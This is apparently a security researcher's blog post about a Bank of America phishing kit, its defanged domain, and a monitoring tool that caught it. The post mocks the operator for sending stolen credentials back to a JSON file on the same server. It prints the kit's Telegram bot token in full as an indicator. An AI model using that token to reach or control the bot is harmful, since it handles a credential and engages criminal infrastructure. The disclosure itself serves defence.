please, don’t call every idiot who commits crimes using a computer a “hacker”. I know I’m harping on about this, but it’s very important to me. The term “hacker” refers to an individual who studies, commits himself, and is driven by an indomitable passion. The press, however, decided that this term was appropriate for any idiot who commits a crime using a computer.
Today I bring you a splendid example of an idiot that some will call a “hacker”.
This genius registered a domain (helpvdeskerify247[.]com) to install a kit to steal credentials from Bank of America customers. Matrix discovered the domain and reported it as “opendir.”
The domain was flagged on urlscan some minutes after registration 😉
Since it was clearly suspicious, Matrix continued monitoring. After a few hours Matrix intercepts a change on the site and identifies a cloacker, which it then reports as a possible threat.
A day later, the criminal takes down the site and exposes the kit: Matrix then intercepts, downloads, and analyzes it. It identifies and reports it, highlighting the threat.
Here, the criminal already proves he’s no genius. Analyzing the kit, however, reveals a hidden gem… To secure the credentials, the kit uses a Telegram bot:
7937236406:AAGHUl2hThlX_SuxhkIuxVk2ZhAPoxuW8Ao
Okay, nothing unusual, so what’s the strangeness? The genius, instead of leaving the information in the bot’s queue, decides to record a callback. The attack therefore seems a bit more complex than usual. But here’s where the genius shines: the callback is based on the same domain where the kit is located!
So, after traveling around the world, where did the stolen credentials end up? In a damn JSON file on the same machine. 😀 😀 😀
I challenge anyone here to use the term “hacker” to describe this guy!!!
Besides, after two days, GSB and VT continue to ignore this domain. Very well, I’d say.
Emiliano Carlesi's blog 